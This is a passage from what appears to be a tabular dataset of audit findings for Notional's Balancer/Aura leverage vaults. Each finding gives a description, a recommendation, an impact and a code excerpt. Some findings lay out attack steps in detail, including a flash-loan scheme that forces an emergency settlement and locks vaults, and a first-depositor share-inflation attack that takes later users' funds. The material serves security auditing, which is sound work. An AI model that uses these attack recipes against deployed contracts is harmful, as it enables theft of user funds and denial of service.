poolContext.basePool.pool.totalSupply()\\n );\\n uint256 bptHeldAfterJoin = strategyContext.totalBPTHeld + bptMinted;\\n if (bptHeldAfterJoin > bptThreshold)\\n revert Errors.BalancerPoolShareTooHigh(bptHeldAfterJoin, bptThreshold);\\n\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n }\\n```\\n\\nAnother key point that is critical for this issue is that when the total number of BPT owned by the vault exceeds the BPT threshold, an emergency settlement can be triggered against the vault and anyone can triggered it as it is permissionless. A major side-effect of an emergency settlement is that the vault will be locked up after the emergency settlement. No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens. The reason is that after the emergency settlement, there will be some asset cash balance in the vault and this will cause no one to be able to enter the vault due to the require check at Line 218. This side-effect has been verified by reviewing the codebase and clarifying with the sponsors.\\n```\\nFile: VaultState.sol\\n function enterMaturity(\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n VaultConfig memory vaultConfig,\\n uint256 strategyTokenDeposit,\\n uint256 additionalUnderlyingExternal,\\n bytes calldata vaultData\\n ) internal returns (uint256 strategyTokensAdded) {\\n // If the vault state is holding asset cash this would mean that there is some sort of emergency de-risking\\n // event or the vault is in the process of settling debts. In both cases, we do not allow accounts to enter\\n // the vault.\\n require(vaultState.totalAssetCash == 0);\\n```\\n\\nIf an attacker could force an emergency settlement on a vault anytime, he would be able to perform a DOS on the vault since the vault will basically be locked up after it. The following demonstrates how this can be performed:\\nAssume that the total supply of BTP in the WETH/stETH Balancer Pool is 100,000 Therefore, the BPT threshold of the vault will be 20,000.\\nAssume that the total number of BPT held by the vault is 19,900.\\nNote that under normal circumstances, it is not possible for the users to exceed the BPT threshold because the transaction will revert if the `bptHeldAfterJoin > bptThreshold` after the user enters the vault.\\nNote that at this point, the emergency settlement CANNOT be triggered against the vault because the vault has not exceeded BPT threshold yet\\nBob (attacker) flash-loans a large amount of ETH from dydx where the fee is almost non-existence (1 Wei Only)\\nBob allocates a portion of his ETH to join the WETH/stETH Balancer Pool. This will cause the total supply of BPT to increase significantly to 200,000.\\nBob allocates a portion of his ETH to enter the vault and causes the total number of BPT held by the vault to increase by 150 from 19,900 to 20,050. This is allowed because the total supply of BPT has increased to 200,000, and thus the BPT threshold has increased to 40,000. Also, Bob does not leverage himself and does not borrow from Notional since the flash loan already provided him with access to a large number of funds, and thus he does not need to pay for any borrowing cost to minimize the cost of this attack.\\nAt this point, due to the inflow of 150 BPT to the Balancer Pool, the total supply of BPT increase from 200,000 to 200,150.\\nAfter entering the vault, Bob exits the WETH/stETH Balancer Pool entirely with all his 100,000 BPT position. This will cause the total supply of BPT to fall back to 100,150. Per my research, there is no exit fee when a Liquidity Provider exits a pool. Also, a Liquidity Provider only suffers a loss due to impermanent loss. However, since all these steps are executed within the same transaction, there is no impermanent loss because no one perform any token swap. Thus, there is no cost incurred by Bob for this step.\\nNote that at this point, the emergency settlement CAN be triggered against the vault because the vault has exceeded the BPT threshold. The total number of BPT held by the vault is 20,050, and the BPT threshold is 20,030 (=100,150 * 0.2).\\nAnyone can trigger the emergency settlement as it is permissionless. Bob triggered an emergency settlement against the vault, and 20 BPT will be sold off in the market so that the vault will not exceed the BPT threshold. It is important to ensure that the number of BPTs to be sold is kept as low as possible so that the total value of the vault will not be reduced by slippage during the trade. This is because Bob still owns the shares of the vault and he wants to get back as much of his original deposit as possible later. This value can be optimized further with Math.\\nAs mentioned earlier, after an emergency settlement, the vault will be locked up. No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens.\\nBob proceeds to redeem all his shares from the vault. He will get back all of his deposits minus the 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders which is insignificant. Note that the Notional's leverage vault does not impose any exit fee.\\nBob proceeds to repay back his loan and pay 1 wei as the fee to dydx.\\nThe cost of attack is 1 wei (flash-loan fee) + 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders, which is insignificant. The slippage loss during emergency settlement can be minimized by causing the total number of BPT held by the vault to exceed the BPT threshold by the smallest possible value.\\nAll the above steps will be executed within a single block/transaction.","Short term, consider the following measures to mitigate the issue:\\nThe emergency settlement function is permissionless and can be called by anyone. It is recommended to implement access control to ensure that this function can only be triggered by Notional.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. If the user entered the vault in this block, he/she could only exit at the next block.\\nLong term, update the implementation of the vault so that the vault will not be locked up after an emergency settlement. After selling off the excess BPT, the vault should allow users to enter the vault as per normal.","Malicious users can lock up all the leverage vaults offered by Notional causing denial-of-service. This results in a loss of funds for the protocol as the vault is no longer generating profit for the protocol, and also a loss of funds for vault users as they cannot realize the profits because they are forced to exit the vault prematurely.\\nThe following are various reasons why someone would want to perform a DOS on Notional vaults:\\nDamage the reputation of Notional, and reduce users' trust in Notional\\nA competitor who is also offering a leverage vault attempts to bring down Notional\\nSomeone who shorted Notional's protocol token","```\\nFile: BalancerEnvironment.py\\n ""oracleWindowInSeconds"": 3600,\\n ""maxBalancerPoolShare"": 2e3, # 20%\\n ""settlementSlippageLimitPercent"": 5e6, # 5%\\n```\\n" +Corruptible Upgradability Pattern,medium,"Storage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during an upgrade.\\nFollowing are the inheritance of the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nNote: The contracts highlighted in Orange mean that there are no gap slots defined. The contracts highlighted in Green mean that gap slots have been defined\\nInheritance of the MetaStable2TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nInheritance of the Boosted3TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n Boosted3TokenAuraVault-->Boosted3TokenPoolMixin:::nogap\\n Boosted3TokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nThe Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults are meant to be upgradeable. However, it inherits contracts that are not upgrade-safe.\\nThe gap storage has been implemented on the `BaseStrategyVault` and `BalancerStrategyBase` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n}\\n```\\n\\n```\\nabstract contract BalancerStrategyBase is BaseStrategyVault, UUPSUpgradeable {\\n /** Immutables */\\n uint32 internal immutable SETTLEMENT_PERIOD_IN_SECONDS;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[100] private __gap;\\n}\\n```\\n\\nHowever, no gap storage is implemented on the `Boosted3TokenPoolMixin`, `MetaStable2TokenVaultMixin`, `TwoTokenPoolMixin`, `PoolMixin`, `AuraStakingMixin` and `BalancerOracleMixin` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nThus, adding new storage variables to any of these inherited contracts can potentially overwrite the beginning of the storage layout of the child contract. causing critical misbehaviors in the system.",Consider defining an appropriate storage gap in each upgradeable parent contract at the end of all the storage variable definitions as follows:\\n```\\nuint256[50] __gap; // gap to reserve storage in the contract for future variable additions\\n```\\n\\nReference\\nA similar issue was found in the past audit report:,"Storage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during upgrading, thus causing the vaults to be broken and assets to be stuck.",```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n +Did Not Approve To Zero First,medium,"Allowance was not set to zero first before changing the allowance.\\nSome ERC20 tokens (like USDT) do not work when changing the allowance from an existing non-zero allowance value. For example Tether (USDT)'s `approve()` function will revert if the current approval is not zero, to protect against front-running changes of approvals.\\nThe following attempt to call the `approve()` function without setting the allowance to zero first.\\n```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n\\nHowever, if the token involved is an ERC20 token that does not work when changing the allowance from an existing non-zero allowance value, it will break a number of key functions or features of the protocol as the `TokenUtils.checkApprove` function is utilised extensively within the vault as shown below.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _approveBalancerTokens(TwoTokenPoolContext memory poolContext, address bptSpender) internal {\\n IERC20(poolContext.primaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n IERC20(poolContext.secondaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n // Allow BPT spender to pull BALANCER_POOL_TOKEN\\n IERC20(address(poolContext.basePool.pool)).checkApprove(bptSpender, type(uint256).max);\\n }\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _approveBalancerTokens(ThreeTokenPoolContext memory poolContext, address bptSpender) internal {\\n poolContext.basePool._approveBalancerTokens(bptSpender);\\n\\n IERC20(poolContext.tertiaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n\\n // For boosted pools, the tokens inside pool context are AaveLinearPool tokens.\\n // So, we need to approve the _underlyingToken (primary borrow currency) for trading.\\n IBoostedPool underlyingPool = IBoostedPool(poolContext.basePool.primaryToken);\\n address primaryUnderlyingAddress = BalancerUtils.getTokenAddress(underlyingPool.getMainToken());\\n IERC20(primaryUnderlyingAddress).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n }\\n```\\n\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n IERC20(trade.sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n IERC20(buyToken).checkApprove(address(Deployments.WRAPPED_STETH), amountBought);\\n uint256 wrappedAmount = Deployments.WRAPPED_STETH.balanceOf(address(this));\\n /// @notice the amount returned by wrap is not always accurate for some reason\\n Deployments.WRAPPED_STETH.wrap(amountBought);\\n amountBought = Deployments.WRAPPED_STETH.balanceOf(address(this)) - wrappedAmount;\\n```\\n",It is recommended to set the allowance to zero before increasing the allowance and use safeApprove/safeIncreaseAllowance.,A number of features within the vaults will not work if the `approve` function reverts.,"```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n" +`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`,medium,"`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`\\nWhen `enterVault` in `VaultAccountAction.sol` is called, the first function that is called is `requireValidAccount`. This function checks to ensure that the passed-in `account` parameter is not a system-level `account` address:\\n```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n\\nWith the above checks, `requireValidAccount` ensures that any Notional system-level account cannot enter a vault. However, `deleverageAccount` in `VaultAccountAction.sol` allows liquidators to transfer vault shares from a liquidated account into their own account. In the case that a liquidator is not already entered into a vault, then `deleverageAccount` will instantiate a vault account for them (using _transferLiquidatorProfits) before depositing the liquidated account's vault shares into the newly-instantiated account. This effectively circumvents the `requireValidAccount` check in `enterVault`.","Consider updating the `require` statement in `_transferLiquidatorProfits` to the following:\\n```\\nrequire(liquidator.maturity == maturity, ""Vault Shares Mismatch""); // dev: has vault shares\\n```\\n\\nRemoving the option of allowing addresses that do not have a maturity in the respective vault to receive shares and therefore implicitly enter a vault prevents Notional system accounts from being able to enter into vaults.","Any address that would otherwise be restricted from entering vaults via the `requireValidAccount` check would be able to circumvent that function using `deleverageAccount`. I assume these system-level accounts are restricted from entering vaults as they have access to internal Notional state and are used across the protocol, so having them be able to enter vaults could negatively impact Notional.\\nAssuming that all the relevant Notional system accounts are smart contracts that do not allow arbitrary calls, then having any of the system accounts themselves trigger this issue is infeasible. However, as a result of another issue it is possible for a vault to force an arbitrary address to deleverage accounts, which could be used to force a Notional system account to enter into a vault.","```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n" +No Validation Check Against Decimal Of Secondary Token,medium,"There is no validation check against the decimal of the secondary token due to a typo. Thus, this will cause the vault to be broken entirely or the value of the shares to be stuck if a secondary token with more than 18 decimals is added.\\nThere is a typo in Line 65 within the `TwoTokenPoolMixin` contract. The validation at Line 65 should perform a check against the `secondaryDecimals` instead of the `primaryDecimals`. As such, no validation was performed against the secondary token.\\n```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n\\nIf the decimal of the secondary tokens is more than 18, the `Stable2TokenOracleMath._getSpotPrice` will stop working as the code will revert in Line 24 below because the decimal of secondary tokens is more than 18.\\nWhen the `Stable2TokenOracleMath._getSpotPrice` function stop working, the vaults will be broken entirely because the settle vault and reinvest rewards functions will stop working too. This is because the settle vault and reinvest rewards functions will call the `Stable2TokenOracleMath._getSpotPrice` function internally, resulting in a revert.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n // Prevents overflows, we don't expect tokens to be greater than 18 decimals, don't use\\n // equal sign for minor gas optimization\\n require(poolContext.primaryDecimals < 19); /// @dev primaryDecimals overflow\\n require(poolContext.secondaryDecimals < 19); /// @dev secondaryDecimals overflow\\n require(tokenIndex < 2); /// @dev invalid token index\\n```\\n","Update the code to perform the validation against the `secondaryDecimals` state variable.\\n```\\nconstructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n) PoolMixin(notional_, params) {\\n ..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n// Remove the line below\\n require(primaryDecimals <= 18);\\n// Add the line below\\n require(secondaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n}\\n```\\n","The `Stable2TokenOracleMath._getSpotPrice` will stop working, which will in turn cause the settle vault and reinvest rewards functions to stop working too. Since a vault cannot be settled, the vault is considered broken. If the reinvest rewards function cannot work, the value of users' shares will be stuck as the vault relies on reinvesting rewards to buy more BPT tokens from the market.\\nIn addition, there might be some issues when calculating the price of the tokens since the vault assumes that both primary and secondary tokens have a decimal equal to or less than 18 OR some overflow might occur when processing the token value.","```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n" +Vault Share/Strategy Token Calculation Can Be Broken By First User/Attacker,medium,"A well-known attack vector for almost all shares-based liquidity pool contracts, where an early user can manipulate the price per share and profit from late users' deposits because of the precision loss caused by the rather large value of price per share.\\nNote: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nFor simplicity's sake, we will simplify the `strategy token` minting formula as follows. Also, assume that the 1 `vault share` is equivalent to 1 `strategy token` for this particular strategy vault, therefore, we will use the term `vault share` and `strategy token` interchangeably here.\\n```\\nstrategyToken = (totalBPTHeld == 0) ? bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n\\nThe vault minting formula is taken from the following:\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n }\\n```\\n\\nIf the attacker who is the first depositor claims 1 BPT, he will receive 1 Strategy Token. So 1 BPT per Strategy Token. At this point in time, `totalBPTHeld = 1` and `totalStrategyToken = 1`.\\nThe attacker obtains 9999 BPT can be obtained from the open market. He proceeds to deposit the 9999 BPT into the Aura reward pool on behalf of the vault. At this point in time, `totalBPTHeld = 10000` and `totalStrategyToken = 1`. So 10000 BPT per Strategy Token. Refer to the ""How to increase the total BPT held?"" section below for more details.\\nTwo issues can occur from here.\\nIssue 1 - If bptClaim >= totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost and stolen by an attacker. Assume that Alice deposits/borrow some assets and received 19999 BPT. Based on the formula, Alice will only receive 1 Strategy Token. She immediately loses 9999 BPT or half of her assets if she exits the vault or redeems the strategy tokens right after the deposit.\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (19999 * 1) / 10000 = 1\\n```\\n\\nIf the attacker exits the vault right after Alice's deposit, the attacker will receive 14999 BPT. He profited 4999 BPT from this attack\\n```\\nbptReceived = (strategyToken * totalBPTHeld) / totalStrategyToken\\nbptReceived = (1 * 29999) / 2 = 14999\\n```\\n\\nIssue 2 - If bptClaim < totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost entirely. Assume that Alice deposits/borrow some assets and received 9999 BPT\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (9999 * 1) / 10000 = 0\\n```\\n\\nAs such, she deposited 9999 BPT but did not receive any strategy tokens in return.\\nHow to increase the total BPT held?\\nUnlike the vault design seen in other protocols, Notional's leverage vault does not compute the total BPT held by the vault directly via `BTP.balanceOf(address(vault))`. The vault deposit its BPT to the Aura Reward Pool. Therefore, it is not possible to increase the total BPT held by the vault simply by performing a direct BPT token transfer to the vault or Aura Reward Pool in an attempt to increase it.\\nHowever, there is a workaround to increase the total BPT held by the vault, and this can be executed by anyone.\\nThe `totalBPTHeld` within the vault is obtained by calling the `PoolMixin._bptHeld` function.\\n```\\nFile: PoolMixin.sol\\n function _baseStrategyContext() internal view returns(StrategyContext memory) {\\n return StrategyContext({\\n totalBPTHeld: _bptHeld(),\\n settlementPeriodInSeconds: SETTLEMENT_PERIOD_IN_SECONDS,\\n tradingModule: TRADING_MODULE,\\n vaultSettings: BalancerVaultStorage.getStrategyVaultSettings(),\\n vaultState: BalancerVaultStorage.getStrategyVaultState(),\\n feeReceiver: FEE_RECEIVER\\n });\\n }\\n```\\n\\nWithin the `PoolMixin._bptHeld` function, it will call the `AURA_REWARD_POOL.balanceOf(address(this))` to retrieve the number of BPT that the vault has deposited into the Aura Reward Pool.\\n```\\nFile: PoolMixin.sol\\n /// @dev Gets the total BPT held by the aura reward pool\\n function _bptHeld() internal view returns (uint256) {\\n return AURA_REWARD_POOL.balanceOf(address(this));\\n }\\n```\\n\\nThe following is the contract of the AURA_REWARD_POOL taken from the Etherscan. Note that the `AURA_REWARD_POOL.balanceOf` will retrieve the number of BPT tokens held by an account. In this example, the account will be the vault's address.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @dev Returns the amount of tokens owned by `account`.\\n */\\nfunction balanceOf(address account) public view override(BaseRewardPool, IERC20) returns (uint256) {\\n return BaseRewardPool.balanceOf(account);\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol\\nfunction balanceOf(address account) public view virtual returns (uint256) {\\n return _balances[account];\\n}\\n```\\n\\nTo increase the balance, the `deposit(uint256 _pid, uint256 _amount, bool _stake)` function of Aura's Booster contract can be called. However, the problem is that this function will deposit to the `msg.sender` and there is no way to spoof the vault's address. Thus, using this function will not work.\\nHowever, there is a second method that can be used to perform a deposit. The `AURA_REWARD_POOL` point to the `BaseRewardPool4626`, thus the reward pool is an ERC4626 vault. The Aura's ERC4626 vault supports an alternative deposit function called `BaseRewardPool4626.deposit` that allows anyone to deposit on behalf of another account. An attacker can leverage the `BaseRewardPool4626.deposit` function by specifying the `receiver` parameter to be the `vault.address` in an attempt to increase the total BPT tokens held by the vault.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @notice Mints `shares` Vault shares to `receiver`.\\n * @dev Because `asset` is not actually what is collected here, first wrap to required token in the booster.\\n */\\nfunction deposit(uint256 assets, address receiver) public virtual override nonReentrant returns (uint256) {\\n // Transfer ""asset"" (crvLP) from sender\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), assets);\\n\\n // Convert crvLP to cvxLP through normal booster deposit process, but don't stake\\n uint256 balBefore = stakingToken.balanceOf(address(this));\\n IDeposit(operator).deposit(pid, assets, false);\\n uint256 balAfter = stakingToken.balanceOf(address(this));\\n\\n require(balAfter.sub(balBefore) >= assets, ""!deposit"");\\n\\n // Perform stake manually, now that the funds have been received\\n _processStake(assets, receiver);\\n\\n emit Deposit(msg.sender, receiver, assets, assets);\\n emit Staked(receiver, assets);\\n return assets;\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol \\n/**\\n* @dev Generic internal staking function that basically does 3 things: update rewards based\\n* on previous balance, trigger also on any child contracts, then update balances.\\n* @param _amount Units to add to the users balance\\n* @param _receiver Address of user who will receive the stake\\n*/\\nfunction _processStake(uint256 _amount, address _receiver) internal updateReward(_receiver) {\\n require(_amount > 0, 'RewardPool : Cannot stake 0');\\n\\n //also stake to linked rewards\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).stake(_receiver, _amount);\\n }\\n\\n _totalSupply = _totalSupply.add(_amount);\\n _balances[_receiver] = _balances[_receiver].add(_amount);\\n}\\n```\\n","Consider requiring a minimal amount of strategy tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the Notional Treasury so that the pricePerShare/pricePerStrategyToken can be more resistant to manipulation.\\nReference\\nA similar issue was found in a past Sherlock audit","The attacker can profit from future users' deposits while the late users will lose part of their funds to the attacker. Additionally, it is also possible for users to get no share in return for their deposited funds.",```\\nstrategyToken = (totalBPTHeld == 0) ? bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n +UniV2Adapter#getExecutionData doesn't properly handle native ETH swaps,medium,"UniV2Adapter#getExecutionData doesn't properly account for native ETH trades which makes them impossible. Neither method selected supports direct ETH trades, and sender/target are not set correctly for TradingUtils_executeTrade to automatically convert\\n```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n\\nUniV2Adapter#getExecutionData either returns the swapTokensForExactTokens or swapExactTokensForTokens, neither of with support native ETH. It also doesn't set spender and target like UniV3Adapter, so _executeTrade won't automatically convert it to a WETH call. The result is that all Uniswap V2 calls made with native ETH will fail. Given that Notional operates in native ETH rather than WETH, this is an important feature that currently does not function.","There are two possible solutions:\\nChange the way that target and sender are set to match the implementation in UniV3Adapter\\nModify the return data to return the correct selector for each case (swapExactETHForTokens, swapTokensForExactETH, etc.)\\nGiven that the infrastructure for Uniswap V3 already exists in TradingUtils_executeTrade the first option would be the easiest, and would give the same results considering it's basically the same as what the router is doing internally anyways.",Uniswap V2 calls won't support native ETH,"```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n" +Deployments.sol uses the wrong address for UNIV2 router which causes all Uniswap V2 calls to fail,medium,"Deployments.sol accidentally uses the Uniswap V3 router address for UNIV2_ROUTER which causes all Uniswap V2 calls to fail\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n\\nThe constant UNIV2_ROUTER contains the address for the Uniswap V3 router, which doesn't contain the ""swapExactTokensForTokens"" or ""swapTokensForExactTokens"" methods. As a result, all calls made to Uniswap V2 will revert.",Change UNIV2_ROUTER to the address of the V2 router:\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);\\n```\\n,Uniswap V2 is totally unusable,```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n +stakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.sol,medium,"stakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and 